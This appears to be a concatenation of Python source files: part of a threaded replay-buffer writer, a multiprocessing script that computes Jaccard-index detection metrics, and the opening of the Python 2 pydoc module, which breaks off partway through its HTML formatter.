self.queue = Queue(maxsize=queue_size)
self.finished = False
self.fill_in_strategy = fill_in_strategy
self.internal_thread = None
self.stop_event = stop_event
def start(self):
self.internal_thread = Thread(name="ReplayWriter", target=self.internal_writer).start()
def write(self, worker_data):
self.queue.put(worker_data)
# self._write_to_replay(worker_data)
# if self.flags.reproducible:
# self._write_to_replay(worker_data)
# else:
# self.fill_in_strategy.process_input(self.queue, worker_data)
def internal_writer(self):
while not self.finished:
try:
worker_data = self.queue.get(timeout=2)
except Empty:
continue
self._write_to_replay(worker_data)
self.queue.task_done()
if self.stop_event.is_set():
self.finished = True
def _write_to_replay(self, data):
for i in range(len(data)):
for j in range(len(self.replay_buffers)):
try:
self.replay_buffers[j].store_next(data=data[i])
except Full:
for p in range(len(self.replay_buffers)):
self.replay_buffers[p].cache(1)
try:
self.replay_buffers[j].store_next(data=data[i])
except Full as full:
if self.stop_event.is_set():
return
else:
raise full
if self.stop_event.is_set():
return
def remove_queue_element(self):
self.queue.get()
self.queue.task_done()
def close(self):
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
self.queue.join()
self.finished = True
if self.internal_thread is not None:
self.internal_thread.join()
|
compute_JI.py
|
import os
import sys
import math
import argparse
from multiprocessing import Queue, Process
from tqdm import tqdm
import numpy as np
from .JIToolkits.JI_tools import compute_matching, get_ignores
sys.path.insert(0, '../')
import utils.misc_utils as misc_utils
gtfile = '/data/annotation_val.odgt'
nr_procs = 10
def evaluation_all(path, target_key):
records = misc_utils.load_json_lines(path)
res_line = []
res_JI = []
for i in range(10):
score_thr = 1e-1 * i
total = len(records)
stride = math.ceil(total / nr_procs)
result_queue = Queue(10000)
results, procs = [], []
for i in range(nr_procs):
start = i*stride
end = np.min([start+stride,total])
sample_data = records[start:end]
p = Process(target= compute_JI_with_ignore, args=(result_queue, sample_data, score_thr, target_key))
p.start()
procs.append(p)
tqdm.monitor_interval = 0
pbar = tqdm(total=total, leave = False, ascii = True)
for i in range(total):
t = result_queue.get()
results.append(t)
pbar.update(1)
for p in procs:
p.join()
pbar.close()
line, mean_ratio = gather(results)
line = 'score_thr:{:.1f}, {}'.format(score_thr, line)
print(line)
res_line.append(line)
res_JI.append(mean_ratio)
return res_line, max(res_JI)
def compute_JI_with_ignore(result_queue, records, score_thr, target_key, bm_thresh=0.5):
for record in records:
gt_boxes = misc_utils.load_bboxes(record, 'gtboxes', target_key, 'tag')
gt_boxes[:,2:4] += gt_boxes[:,:2]
gt_boxes = misc_utils.clip_boundary(gt_boxes, record['height'], record['width'])
dt_boxes = misc_utils.load_bboxes(record, 'dtboxes', target_key, 'score')
dt_boxes[:,2:4] += dt_boxes[:,:2]
dt_boxes = misc_utils.clip_boundary(dt_boxes, record['height'], record['width'])
keep = dt_boxes[:, -1] > score_thr
dt_boxes = dt_boxes[keep][:, :-1]
gt_tag = np.array(gt_boxes[:,-1]!=-1)
matches = compute_matching(dt_boxes, gt_boxes[gt_tag, :4], bm_thresh)
# get the unmatched_indices
matched_indices = np.array([j for (j,_) in matches])
unmatched_indices = list(set(np.arange(dt_boxes.shape[0])) - set(matched_indices))
num_ignore_dt = get_ignores(dt_boxes[unmatched_indices], gt_boxes[~gt_tag, :4], bm_thresh)
matched_indices = np.array([j for (_,j) in matches])
unmatched_indices = list(set(np.arange(gt_boxes[gt_tag].shape[0])) - set(matched_indices))
num_ignore_gt = get_ignores(gt_boxes[gt_tag][unmatched_indices], gt_boxes[~gt_tag, :4], bm_thresh)
# compurte results
eps = 1e-6
k = len(matches)
m = gt_tag.sum() - num_ignore_gt
n = dt_boxes.shape[0] - num_ignore_dt
ratio = k / (m + n -k + eps)
recall = k / (m + eps)
cover = k / (n + eps)
noise = 1 - cover
result_dict = dict(ratio = ratio, recall = recall, cover = cover,
noise = noise, k = k, m = m, n = n)
result_queue.put_nowait(result_dict)
def gather(results):
assert len(results)
img_num = 0
for result in results:
if result['n'] != 0 or result['m'] != 0:
img_num += 1
mean_ratio = np.sum([rb['ratio'] for rb in results]) / img_num
mean_cover = np.sum([rb['cover'] for rb in results]) / img_num
mean_recall = np.sum([rb['recall'] for rb in results]) / img_num
mean_noise = 1 - mean_cover
valids = np.sum([rb['k'] for rb in results])
total = np.sum([rb['n'] for rb in results])
gtn = np.sum([rb['m'] for rb in results])
#line = 'mean_ratio:{:.4f}, mean_cover:{:.4f}, mean_recall:{:.4f}, mean_noise:{:.4f}, valids:{}, total:{}, gtn:{}'.format(
# mean_ratio, mean_cover, mean_recall, mean_noise, valids, total, gtn)
line = 'mean_ratio:{:.4f}, valids:{}, total:{}, gtn:{}'.format(
mean_ratio, valids, total, gtn)
return line, mean_ratio
def common_process(func, cls_list, nr_procs):
total = len(cls_list)
stride = math.ceil(total / nr_procs)
result_queue = Queue(10000)
results, procs = [], []
for i in range(nr_procs):
start = i*stride
end = np.min([start+stride,total])
sample_data = cls_list[start:end]
p = Process(target= func,args=(result_queue, sample_data))
p.start()
procs.append(p)
for i in range(total):
t = result_queue.get()
if t is None:
continue
results.append(t)
for p in procs:
p.join()
return results
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Analyze a json result file with iou match')
parser.add_argument('--detfile', required=True, help='path of json result file to load')
parser.add_argument('--target_key', required=True)
args = parser.parse_args()
evaluation_all(args.detfile, args.target_key)
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
def isnonbuiltinmodule(obj):
return inspect.ismodule(obj) and obj is not __builtin__
modules = inspect.getmembers(object, isnonbuiltinmodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
